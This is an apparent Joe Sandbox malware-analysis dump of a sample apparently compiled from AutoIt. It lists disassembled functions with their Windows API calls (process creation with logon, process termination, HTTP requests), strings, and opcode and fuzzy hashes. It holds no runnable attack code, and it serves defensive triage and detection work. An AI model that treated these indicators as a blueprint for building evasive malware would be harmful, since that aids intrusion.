Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 3f8efddf8e27cfc49f9f71bf2fdde4896e6bd5c0b2e1bbe28bb83fdbfe3fee06
Instruction ID: bf814f8a8fcdf8469de4956ed3aabcd0462ccefc834e0822f5d27218401cbaf8
Opcode Fuzzy Hash: 3f8efddf8e27cfc49f9f71bf2fdde4896e6bd5c0b2e1bbe28bb83fdbfe3fee06
Instruction Fuzzy Hash: AC11B13190120DFFDB149FA5DD09BFE77A8EB84315F519128E84DA7111CB329D04DB60

Function 00EE85B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00EE85E2
OpenProcessToken.ADVAPI32(00000000), ref: 00EE85E9
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00EE85F8
CloseHandle.KERNEL32(00000004), ref: 00EE8603
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00EE8632
DestroyEnvironmentBlock.USERENV(00000000), ref: 00EE8646

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 62f35a1895a7afb8846d646466df770e44660c8ee33f8e1aadad4ee38ab851f7
Instruction ID: 532547c40a4b49723e73b4b38c8645faefad7a6b5882ae7643f4d66fc2f45128
Opcode Fuzzy Hash: 62f35a1895a7afb8846d646466df770e44660c8ee33f8e1aadad4ee38ab851f7
Instruction Fuzzy Hash: 60115C7250024EAFDF01CFA5DD49BDE7BA9EF48308F058064FE08A21A0C7718E64EB60

Function 00EEB790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00EEB7B5
GetDeviceCaps.GDI32(00000000,00000058), ref: 00EEB7C6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EEB7CD
ReleaseDC.USER32(00000000,00000000), ref: 00EEB7D5
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00EEB7EC
MulDiv.KERNEL32(000009EC,?,?), ref: 00EEB7FE

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 6fb72b42d36669eeeaf4b0e91fd42ecf679301d203d7cd15d8a08ac10b40da67
Instruction ID: 988043f2475e99c0543035bf76f0c7af0962225b097c447a121ff1f49f2cd56e
Opcode Fuzzy Hash: 6fb72b42d36669eeeaf4b0e91fd42ecf679301d203d7cd15d8a08ac10b40da67
Instruction Fuzzy Hash: 6E018475E0020DBBEF109BA69C45A9EBFB8EB48351F008076FA04E7291D6309C00CF90

Function 00EB0162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00EB0193
MapVirtualKeyW.USER32(00000010,00000000), ref: 00EB019B
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00EB01A6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00EB01B1
MapVirtualKeyW.USER32(00000011,00000000), ref: 00EB01B9
MapVirtualKeyW.USER32(00000012,00000000), ref: 00EB01C1

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: dabe50c1cd9c55c4e08ac2ab53dc4aee6ac1eecedf667159e074f7892ea7b7f9
Instruction ID: 945dd21021dd9234ba3c305bca55f40ff44cd57a45e01c36f7b1e0a99e110233
Opcode Fuzzy Hash: dabe50c1cd9c55c4e08ac2ab53dc4aee6ac1eecedf667159e074f7892ea7b7f9
Instruction Fuzzy Hash: 95016CB0901B597DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A868CBE5

Function 00EF53E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00EF53F9
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00EF540F
GetWindowThreadProcessId.USER32(?,?), ref: 00EF541E
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00EF542D
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00EF5437
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00EF543E

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: b6f72af3239cf72ad7e538387c9d68172f778376b4edd7aaaf4894803a72a5e9
Instruction ID: 3c32bcac446c1b92199ceba1e2abee293e84b5867a965fd9e91877bfa05ea24e
Opcode Fuzzy Hash: b6f72af3239cf72ad7e538387c9d68172f778376b4edd7aaaf4894803a72a5e9
Instruction Fuzzy Hash: 26F0903224055CBBE3215BA2DC0DEFF7B7CEFC6B11F014169FA05E1061D7A01A05A6B5

Function 00EF7230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00EF7243
EnterCriticalSection.KERNEL32(?,?,00EA0EE4,?,?), ref: 00EF7254
TerminateThread.KERNEL32(00000000,000001F6,?,00EA0EE4,?,?), ref: 00EF7261
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00EA0EE4,?,?), ref: 00EF726E

Part of subcall function 00EF6C35: CloseHandle.KERNEL32(00000000,?,00EF727B,?,00EA0EE4,?,?), ref: 00EF6C3F

InterlockedExchange.KERNEL32(?,000001F6), ref: 00EF7281
LeaveCriticalSection.KERNEL32(?,?,00EA0EE4,?,?), ref: 00EF7288

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 9c7d24fbc12f5422724c90dbed670a5165b901af78ad0702b262b4860d423a2c
Instruction ID: 7b5090ff6f281b68ed1bca7ae547d1fc827b482c0136d8c2c278400c4e7f71d0
Opcode Fuzzy Hash: 9c7d24fbc12f5422724c90dbed670a5165b901af78ad0702b262b4860d423a2c
Instruction Fuzzy Hash: F5F0277654060AEBE7111F64EC4C9EB773AFF05312F020232F603A00B0CBB61904DB50

Function 00EE8992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00EE899D
UnloadUserProfile.USERENV(?,?), ref: 00EE89A9
CloseHandle.KERNEL32(?), ref: 00EE89B2
CloseHandle.KERNEL32(?), ref: 00EE89BA
GetProcessHeap.KERNEL32(00000000,?), ref: 00EE89C3
HeapFree.KERNEL32(00000000), ref: 00EE89CA

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 8e956fc002167bee5d8a35cad0d74a05b11fb41d9a13630ffc0bddc69dc8ff88
Instruction ID: 5d4febb7e8b07ab073cd4333bee8e9d413164bdfded30ac48399c37f36b88f08
Opcode Fuzzy Hash: 8e956fc002167bee5d8a35cad0d74a05b11fb41d9a13630ffc0bddc69dc8ff88
Instruction Fuzzy Hash: 93E0C236104409FBDA011FE1EC0C98ABB69FB89322B128230F229910B0CB329428EF50

Function 00F085ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00F08613
CharUpperBuffW.USER32(?,?), ref: 00F08722
VariantClear.OLEAUT32(?), ref: 00F0889A

Part of subcall function 00EF7562: VariantInit.OLEAUT32(00000000), ref: 00EF75A2
Part of subcall function 00EF7562: VariantCopy.OLEAUT32(00000000,?), ref: 00EF75AB
Part of subcall function 00EF7562: VariantClear.OLEAUT32(00000000), ref: 00EF75B7

Strings

Incorrect Parameter format, xrefs: 00F0864B, 00F0880D
AUTOIT.ERROR, xrefs: 00F08728

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 92b612ee144dabe1702edf8f8e8f0c49f5a33b11fa32ddab4ab1560f4488d72f
Instruction ID: 0ff6261352b0314c0b1cc5fb12d4418f51a4b9ec150bf9e8a9120e89ea1ecc92
Opcode Fuzzy Hash: 92b612ee144dabe1702edf8f8e8f0c49f5a33b11fa32ddab4ab1560f4488d72f
Instruction Fuzzy Hash: FA919171A04301DFCB10DF24C48195ABBE4EF89754F14892DF89A9B3A2DB31ED06DB52

Function 00EF2A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00EAFC86: _wcscpy.LIBCMT ref: 00EAFCA9

_memset.LIBCMT ref: 00EF2B87
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00EF2BB6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00EF2C69
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00EF2C97

Strings

0, xrefs: 00EF2B73

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 58dfa7dda9bcd6282bf295e716ca37bb61ac52fbecbbd7e0269db058ddd0f4c6
Instruction ID: ab7305c4a1c2305dbac6761432e49fc11ba3fd1867ca9fe74879adabd8ed2de6
Opcode Fuzzy Hash: 58dfa7dda9bcd6282bf295e716ca37bb61ac52fbecbbd7e0269db058ddd0f4c6
Instruction Fuzzy Hash: A051DF712083089AD7249F28C845ABFB7E4EF85718F046A2DFB95F7190DB70CC049B92

Function 00EA3137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00EA3277
_memmove.LIBCMT ref: 00EA3310
_free.LIBCMT ref: 00EA3336
_memmove.LIBCMT ref: 00EA33E9

Strings

_, xrefs: 00EA3322
3c, xrefs: 00EA3225

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: _memmove$_free
String ID: 3c$_
API String ID: 2620147621-4099079164
Opcode ID: 9e81fc32c4f296219df6e587b55ae4893bd25ad9bfc950195871dea75adb8667
Instruction ID: 6a4b3b513aaa6b1f51aaa8d91cafc0a8bb8a5ae5d053216ac72474256c6f03b5
Opcode Fuzzy Hash: 9e81fc32c4f296219df6e587b55ae4893bd25ad9bfc950195871dea75adb8667
Instruction Fuzzy Hash: 40511671A083418FDB25CF28C491A6FBBE5AF8A314F44592DF999AB351DB31E901CB42

Function 00EA6192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EA6248
_memmove.LIBCMT ref: 00EA62E4
_memset.LIBCMT ref: 00EA6308

Strings

ERCP, xrefs: 00EA61B3
3c, xrefs: 00EA62AF

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: _memset$_memmove
String ID: 3c$ERCP
API String ID: 2532777613-1756721700
Opcode ID: e2cfa180587a2796852a36e91ea324c0288d00c8f782cdf511fce5d0d2a3eb79
Instruction ID: e7eaf05d9c4e305e554255381ea9576157692dc73334d88633b720c60b7e031f
Opcode Fuzzy Hash: e2cfa180587a2796852a36e91ea324c0288d00c8f782cdf511fce5d0d2a3eb79
Instruction Fuzzy Hash: E051A070A00309DBDB24CF65C8417EBBBF4EF4A314F24556EE94AEB251E770AA44CB50

Function 00EED56C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00EED5D4
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00EED60A
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00EED61B
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00EED69D

Strings

DllGetClassObject, xrefs: 00EED610

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 708e34c67bfc52e46a0e48179701d6c5d55736b16939a300db7a7f6da401a154
Instruction ID: 70b2aac6c7bebc3d278665899bf387adb82f8477c167db6a5c1abaead42032ee
Opcode Fuzzy Hash: 708e34c67bfc52e46a0e48179701d6c5d55736b16939a300db7a7f6da401a154
Instruction Fuzzy Hash: 1B41C0B1604249EFDB04CF25CC84B9A7BB9EF44314F1191AAEC09AF205D7B1DD44DBA0

Function 00EF2753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EF27C0
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00EF27DC
DeleteMenu.USER32(?,00000007,00000000), ref: 00EF2822
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00F55890,00000000), ref: 00EF286B

Strings

0, xrefs: 00EF27B5

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 6ddc51b860554403a67e2b212d8b0ef75728712e90e77027d2dfffefe5bd9cd4
Instruction ID: b18dcfb02efdac3249f30d09f88f6353bef73dfcb588da1711d7e8dce92f17d7
Opcode Fuzzy Hash: 6ddc51b860554403a67e2b212d8b0ef75728712e90e77027d2dfffefe5bd9cd4
Instruction Fuzzy Hash: 1441CF712043859FDB28DF24CC45B6ABBE8EF85364F04492DFBA5A7291D730E804CB52

Function 00F0D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00F0D7C5

Part of subcall function 00E9784B: _memmove.LIBCMT ref: 00E97899

Strings

cdecl, xrefs: 00F0D81C
none, xrefs: 00F0D8A0
stdcall, xrefs: 00F0D847
winapi, xrefs: 00F0D836

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 959b8755d719bcb47f8abb475beba30e16a1d20f125dbaf3414e45e7f57f39af
Instruction ID: 1bbe2654af5ad8adb273366d49ee3927e88ca656a843894a506311ce9a8f1113
Opcode Fuzzy Hash: 959b8755d719bcb47f8abb475beba30e16a1d20f125dbaf3414e45e7f57f39af
Instruction Fuzzy Hash: 50319271904619ABCF00EF94CC519FFB7F5FF05320B108A29E865A76D1DB71A905EB80

Function 00EE8E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E97DE1: _memmove.LIBCMT ref: 00E97E22

Part of subcall function 00EEAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00EEAABC

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00EE8F14
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00EE8F27
SendMessageW.USER32(?,00000189,?,00000000), ref: 00EE8F57

Part of subcall function 00E97BCC: _memmove.LIBCMT ref: 00E97C06

Strings

ListBox, xrefs: 00EE8ED3
ComboBox, xrefs: 00EE8E9E

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: a20bad923e93355efc3cd8a693018894f7dc4572c62f44cf034239603df1880f
Instruction ID: 83ea51a4880bc85b56db834455f38a7fb21aea2fe4824a01314a9cd207af476b
Opcode Fuzzy Hash: a20bad923e93355efc3cd8a693018894f7dc4572c62f44cf034239603df1880f
Instruction Fuzzy Hash: 3421F071A0420CBADF14ABB1DC85DFFB7A9DF05360B149129F829B71E0DB395809D610

Function 00F0182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F0184C
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F01872
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00F018A2
InternetCloseHandle.WININET(00000000), ref: 00F018E9

Part of subcall function 00F02483: GetLastError.KERNEL32(?,?,00F01817,00000000,00000000,00000001), ref: 00F02498
Part of subcall function 00F02483: SetEvent.KERNEL32(?,?,00F01817,00000000,00000000,00000001), ref: 00F024AD

Strings

, xrefs: 00F01893

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 569ce81f41cf098e3e46fbdae15d280aefe025c7183eae9d0b4bcb4d2a693810
Instruction ID: ec14eb1315321c60b01d66ea20cb6832f75edabc3fd865c379a36fce43bc2156
Opcode Fuzzy Hash: 569ce81f41cf098e3e46fbdae15d280aefe025c7183eae9d0b4bcb4d2a693810
Instruction Fuzzy Hash: 15214CB150020CBFEB119B659C85EBF77EDFB48754F10812AF905A6280EA749E09B7A1

Function 00F163E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E91D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E91D73
Part of subcall function 00E91D35: GetStockObject.GDI32(00000011), ref: 00E91D87
Part of subcall function 00E91D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E91D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00F16461
LoadLibraryW.KERNEL32(?), ref: 00F16468
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00F1647D
DestroyWindow.USER32(?), ref: 00F16485

Strings

SysAnimate32, xrefs: 00F1643C

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
